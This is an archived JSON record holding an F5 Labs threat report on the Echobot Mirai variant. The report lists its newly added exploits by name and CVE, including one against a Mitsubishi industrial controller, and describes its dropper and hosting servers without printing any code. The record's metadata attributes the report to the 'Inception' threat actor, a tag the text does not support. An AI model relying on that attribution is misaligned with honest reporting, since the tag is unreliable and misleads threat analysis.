{
	"id": "28ad47b6-1dee-485a-a1ef-ffbfa07bc1f7",
	"created_at": "2026-04-06T00:14:13.315331Z",
	"updated_at": "2026-04-10T13:12:26.311478Z",
	"deleted_at": null,
	"sha1_hash": "ff4f7774def3c175451d13d9cfeadfc5879e2f5a",
	"title": "Echobot Malware Now up to 71 Exploits, Targeting SCADA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 954785,
	"plain_text": "Echobot Malware Now up to 71 Exploits, Targeting SCADA\r\nBy Authors \u0026 Contributors\r\nArchived: 2026-04-05 23:06:06 UTC\r\nF5 Networks researchers have detected a new variant of the \"Echobot\" malware, now consisting of 71 exploits.\r\nThe authors continue to follow the trend of arming the malware and for the threat group to expand its operation.\r\nThese newly added exploits target both old and new vulnerabilities, adding as new ones target industrial control\r\nsystem devices from Mitsubishi, Barracuda web app firewall, Citrix NetScaler application delivery controllers,\r\nvideo conferencing systems, and additional network and endpoint administration tools.\r\nEarlier this year, Palo Alto Networks1 reported a new variant from the Mirai malware family, dubbed \"Echobot\"\r\nafter the dropped file name of the malware. Initial versions of the malware used 26 exploits to propagate itself.\r\nLater in August of 2019 it was reported2 to go over 50 exploits. So at 71 we are seeing substantial growth in\r\nEchobot’s attack capability.\r\nNew Target: Factory Automation Systems\r\nAlthough the core malware functionality of this latest variant hasn't changed much since inception, the addition of\r\na variety of new exploits puts new systems into its crosshairs.\r\nWhile most of the Mirai variants target IoT devices, such as home routers and IP cameras, this version of Echobot\r\nadds an outstanding exploit for CVE-2019-14927, which targets Mitsubishi Electric‘s Remote Terminal Unit\r\n(RTU).\r\nThe Mitsubishi RTU3 is an industrial controller with remote access to communicate with SCADA systems in the\r\noil and gas industry, power industry, and others. Industrial control systems have seen an increase in attacks over\r\nthe past years4, including some chilling suggestions of possible cyber-terrorism attacks5. However, it is\r\nuncommon for general-purpose botnets like Mirai to include exploits targeting a specific component such as the\r\nMitsubishi RTU. Figure 1 below shows the product web page for the Mitsubishi smartRTU. While industrial\r\ncontroller systems are essential components responsible for running critical infrastructure, they were never\r\ndesigned to be Internet-connected and are therefore notoriously known for security-related flaws. Echobot\r\nleverages that weakness, making it more dangerous than before.\r\nhttps://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nPage 1 of 7\n\nFigure 1. Web page for the Mitsubishi smartRTU\r\nIn September 2019, the U.S. Department of Homeland Security issued an alert6, shown in Figure 2, to address\r\nMitsubishi's RTU vulnerability. The alert followed a publication of a proof-of-concept exploit by a researcher\r\nknown as @xerubus7, who discovered and responsibly reported this vulnerability.\r\nFigure 2. Department of Homeland Security vulnerability alert page\r\nIndustrial control systems are known to be very difficult to patch due to the risks involved while introducing\r\nconfiguration changes to critical infrastructure systems. This means there is a larger vulnerability exposure\r\nwindow, compared to traditional IT systems, which provides attackers with a much larger opportunity to exploit\r\nnew vulnerabilities.\r\nAnalysis of the Exploits\r\nhttps://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nPage 2 of 7\n\nIn the beginning, Echobot consisted of a very odd mix of exploits.8\r\n Initial Mirai variants targeted IoT devices,\r\nsuch as home routers, digital surveillance cameras, and cable modems. Over time, the targets extended to smart\r\ndevices and web servers. Echobot is a very prominent variant in the Mirai landscape, adding to its prey: corporate\r\nnetwork devices, network and enterprise management systems, video conferencing, voice over IP, and Iris\r\nrecognition platforms (as shown in Figure 3). This new Echobot variant builds upon that with similar newer\r\nsystems, while also adding another old exploit for the Barracuda firewall and for the Citrix NetScaler application\r\ndelivery controller.\r\nFigure 3. Iris ID, an Echobot target\r\nOften, Mirai variants add relatively current exploits to get better chances to recruit devices. However, this version\r\nleverages an exploit from 2003, targeting the online payment platform CCBill. At the same time, Echobot added\r\nfour exploits to its arsenal from 2019, while the latest one is from August 2019, targeting Webmin Linux/Unix\r\nadministration panel (CVE-2019-15107). This indicates the authors are looking to exploit both legacy and new\r\nsystems that have fallen through the cracks in a patch management program. The newly added exploits to Echobot\r\nare listed in Table 1 as well as in Figure 4:\r\nExploit Name CVE Targeted System\r\nACTi ASOC 2200 Web Configurator RCE Unassigned (2011) Video surveillance\r\nAVCON6 systems management platform - OGNL\r\nRemote Command Execution\r\nUnassigned (2018) Video conferencing system\r\nBarracuda Spam Firewall 3.3.x -\r\n'preview_email.cgi?file' Arbitrary File Access\r\nCVE-2006-4000 Firewall\r\nCCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote\r\nCode Execution\r\nUnassigned (2003) Online payment platform\r\nhttps://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nPage 3 of 7\n\nEnigma NMS 65.0.0 OS Command Injection CVE-2019-16072\r\nEnterprise Network\r\nManagement software\r\nNetGain Enterprise Manager Command Injection CVE-2017-16608 IT infrastructure monitoring\r\nCitrix/Netscaler SD-WAN 9.1.2.26.561201 -\r\nCommand Injection\r\nCVE-2017-6316\r\nApplication delivery\r\ncontroller\r\n3Com OfficeConnect - Code Execution Unassigned (2009) Router\r\nRuby on Rails - Dynamic Render File Upload /\r\nRemote Code Execution\r\nCVE-2016-0752 Web Application\r\nSar2HTML 3.2.1 - Remote Command Execution Unassigned (2019)\r\nLinux/Unix performance\r\nmonitoring\r\nMitsubishi Electric smartRTU / INEA ME-RTU -\r\nUnauthenticated OS Command Injection Bind Shell\r\nCVE-2019-14927\r\nRemote Terminal Unit based\r\nmonitoring and control\r\nThomson Reuters Velocity Analytics Remote Code\r\nInjection\r\nCVE-2013-5912 Analytics platform\r\nWebmin RCE \u003c=1.920 CVE-2019-15107\r\nLinux/Unix administration\r\nsystem\r\nYachtcontrol Webapplication 1.0 - Unauthenticated\r\nRemote Code Execution\r\nCVE-2019-17270 Yachtcontrol Webservers\r\nTechnicolor TD5130v2 Technicolor TD5336\r\nCVE-2019–18396\r\nCVE-2017–14127\r\nRouter\r\nTable 1. New exploits used by the latest version of Echobot\r\nhttps://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nPage 4 of 7\n\nFigure 4. All of the exploits in the malware code\r\nAttack Infrastructure\r\nEchobot uses its arsenal to spread a dropper, which is a bash script named \"Richard,\" detailed in Figure 5. The\r\ndropper instructs the system to download Echobot and compile and execute it for no fewer than 13 different\r\nprocessor architectures. These hacked servers are then used to host and spread more malware to new targets,\r\nadding more machines to the botnet.\r\nFigure 5. The dropper “Richard's” payload, a bash script\r\nThe Echobot malware itself is hosted on a different server than previously reported. The malware hosting server is\r\nnow a hacked Unraid network attached storage (NAS) system that is completely exposed, allowing anyone to gain\r\nfull admin access using a user-friendly GUI terminal.\r\nNot surprisingly, these servers were taken over by malicious actors, but it is unknown exactly how the server was\r\nexploited. However, it appears that SSH and Telnet services are exposed without any password required. Also,\r\nMirai is known for having credential brute-force capabilities, so this is likely the attackers’ entry point.\r\nhttps://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nPage 5 of 7\n\nReviewing the files on that system, seen in Figure 6, it seems that the attackers just recently (12/10/2019)\r\nuploaded the new malware variant to the hacked server:\r\nFigure 6. New malware variant added to the hacked server\r\nThe other attacking Echobot IPs appear to be infected web servers mostly located in the U.S. and in Europe. Half\r\nof those servers are hosted on DreamHost. An example of an infected web server is shown in Figure 7. The\r\nservices running on the servers are not vectors in the malware's arsenal so they were most likely were brute-forced\r\nto gain control of them.\r\nFigure 7. A typical example of an attacking server infected with Echobot\r\nConclusion\r\nhttps://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nPage 6 of 7\n\nMirai has been around for a few years now, and variants of the original malware have been used all over the world\r\nto create botnets. F5 Labs recently wrote in its ongoing “Hunt for IoT” research series that devices are so easy to\r\ncompromise, preteens are doing it (/content/f5-labs-v2/en/labs/articles/threat-intelligence/the-hunt-for-iot--so-easy-to-compromise--children-are-doing-it.html). There is no sign that IoT botnets will disappear anytime soon,\r\nand we expect new variants to keep appearing. Echobot remains a threat, and the expanding scope of its exploits\r\nindicates it will not be slowing down anytime soon. Echobot's shifting focus to factory automation is notable and\r\nmay indicate a future direction for botnet-building threat actors.\r\nTo keep the threat at bay, enterprises should consider implementing a patch management system in order to\r\nmitigate the risk of vulnerable systems on their networks.\r\nSecurity Controls\r\nEnterprises should consider implementing the following security controls (/content/f5-labs-v2/en/archive-pages/education/what-are-security-controls.html) based on their specific circumstances:\r\nSource: https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nhttps://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada"
	],
	"report_names": [
		"echobot-malware-now-up-to-71-exploits--targeting-scada"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434453,
	"ts_updated_at": 1775826746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ff4f7774def3c175451d13d9cfeadfc5879e2f5a.pdf",
		"text": "https://archive.orkl.eu/ff4f7774def3c175451d13d9cfeadfc5879e2f5a.txt",
		"img": "https://archive.orkl.eu/ff4f7774def3c175451d13d9cfeadfc5879e2f5a.jpg"
	}
}